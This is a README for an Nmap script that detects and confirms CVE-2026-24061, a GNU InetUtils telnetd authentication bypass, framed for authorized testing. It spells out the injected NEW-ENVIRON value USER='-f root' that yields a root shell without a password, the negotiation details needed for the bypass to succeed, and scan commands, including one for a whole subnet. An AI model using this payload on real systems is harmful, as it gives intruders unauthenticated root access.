This Nmap NSE script detects CVE-2026-24061, an authentication bypass vulnerability in GNU InetUtils telnetd versions 1.9.3 through 2.7.
By sending a crafted USER environment variable of the form -f <username> during
Telnet option negotiation, an unauthenticated attacker can obtain a shell with the
privileges of the specified local user — including root — without providing any
password.
Intended Use: Authorized penetration testing and vulnerability assessment only.
Running this script against systems without explicit written permission is illegal.
| Field | Value |
|---|---|
| CVE ID | CVE-2026-24061 |
| Affected | GNU InetUtils telnetd 1.9.3 – 2.7 |
| CVSSv3 Score | 9.8 Critical |
| Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Type | Authentication Bypass (CWE-287) |
| Disclosure | 2026-01-01 |
GNU InetUtils telnetd uses the Telnet NEW-ENVIRON option (RFC 1572) to receive
environment variables from the client during the negotiation phase. The login(1)
program is then invoked with those variables.
The vulnerability arises because telnetd passes the USER variable directly to
login without sanitising it. The login program on Linux accepts a -f <user>
flag meaning "pre-authenticated, do not check password". By injecting
USER="-f root" via the NEW-ENVIRON payload, the attacker bypasses authentication
entirely.
Client → Server: IAC SB NEW-ENVIRON IS VAR "USER" VALUE "-f root" IAC SE
Server response: spawns login -f root → root shell, no password required
| Field | Value |
|---|---|
| Filename | telnet-vuln-cve-2026-24061.nse |
| Categories | vuln, exploit, intrusive |
| Port | TCP/23 (telnet) |
| Tested on | Nmap 7.94 / 7.98, Windows & Linux |
The script performs a full Telnet negotiation mirroring the exact byte sequence
of a real telnet -a client session (reconstructed from Wireshark capture):
- Receive server's opening IAC burst (
DO TTYPE,DO TSPEED,DO ENVIRON, …) - Reply with complete client capability announcement (
WILL TTYPE,WILL LINEMODE, …) - Complete sub-negotiation round (
SB TSPEED,SB ENVIRON,SB TTYPE) - Inject crafted
USER='-f <user>'in the NEW-ENVIRON IS payload - Complete the
WILL ECHO/DO BINARY/WONT LINEMODEsequence
(critical — without this, telnetd cannot finalise PTY setup) - Check whether the server sends a login shell prompt without a password challenge
Result states:
| State | Meaning |
|---|---|
EXPLOIT |
Shell prompt received — bypass confirmed |
LIKELY_VULN |
ENV payload accepted, no password prompt, but no shell prompt |
NOT_VULN |
Password prompt seen, or negotiation did not complete |
# Copy to Nmap scripts directory
sudo cp telnet-vuln-cve-2026-24061.nse /usr/share/nmap/scripts/
# Update script database
sudo nmap --script-updatedb# Copy to Nmap scripts directory (adjust path if needed)
copy telnet-vuln-cve-2026-24061.nse "C:\Program Files (x86)\Nmap\scripts\"
# Update script database (run as Administrator)
nmap --script-updatedbnmap -p 23 --script telnet-vuln-cve-2026-24061 <target># Short form
nmap -p 23 --script telnet-vuln-cve-2026-24061 --script-args user=kali <target>
# Medium form
nmap -p 23 --script telnet-vuln-cve-2026-24061 --script-args telnet-user=kali <target>
# Fully qualified
nmap -p 23 --script telnet-vuln-cve-2026-24061 \
--script-args telnet-vuln-cve-2026-24061.user=kali <target>nmap -p 23 --script telnet-vuln-cve-2026-24061 192.168.1.0/24nmap -p 23 --script telnet-vuln-cve-2026-24061 -v <target> # verbose
nmap -p 23 --script telnet-vuln-cve-2026-24061 -d <target> # debug
nmap -p 23 --script telnet-vuln-cve-2026-24061 -d2 <target> # full hex tracePORT STATE SERVICE
23/tcp open telnet
| telnet-vuln-cve-2026-24061:
| VULNERABLE:
| GNU InetUtils telnetd Authentication Bypass
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2026-24061
| Risk factor: Critical CVSSv3: 9.8
| Description:
| The telnetd service in GNU InetUtils (1.9.3 - 2.7) allows
| authentication bypass via a crafted USER environment variable.
| Sending '-f <user>' results in an unauthenticated login shell.
| Extra information:
| Authentication bypassed: shell prompt received after injecting
| USER='-f root' -- no password challenge was presented.
| References:
| https://nvd.nist.gov/vuln/detail/CVE-2026-24061
| https://github.com/JayGLXR/CVE-2026-24061-POC
|_ https://github.com/SafeBreach-Labs/CVE-2026-24061
PORT STATE SERVICE
23/tcp open telnet
(no script output — NOT_VULN is silent by design, standard Nmap convention)
| Argument | Alias(es) | Default | Description |
|---|---|---|---|
telnet-vuln-cve-2026-24061.user |
telnet-user, user |
root |
Username to inject via -f |
GNU InetUtils telnetd uses the Linemode negotiation (RFC 1184) to determine the
terminal I/O mode. The server sends DO LINEMODE early in negotiation, and the
client initially responds WILL LINEMODE. After the ENV payload exchange, the server
sends WILL ECHO followed by DO BINARY. At this point the client must respond
with WONT LINEMODE to signal character-at-a-time mode — only then can telnetd
complete PTY setup (ioctl TIOCSWINSZ) and fork login. Without this step, the
server logs peer died: Inappropriate ioctl for device and drops the connection.
Nmap's NSE socket API differs from standard Lua socket conventions:
-- Nmap NSE (correct):
local status, data = sock:receive_bytes(1)
if status == true then -- data is the received string- NVD — CVE-2026-24061
- PoC by JayGLXR
- PoC by SafeBreach-Labs
- RFC 1572 — NEW-ENVIRON
- RFC 1184 — Linemode
- Nmap NSE Documentation
This script is provided for authorized security testing and research purposes only. The author is not responsible for any misuse or damage caused by this tool. Always obtain explicit written permission before testing systems you do not own.
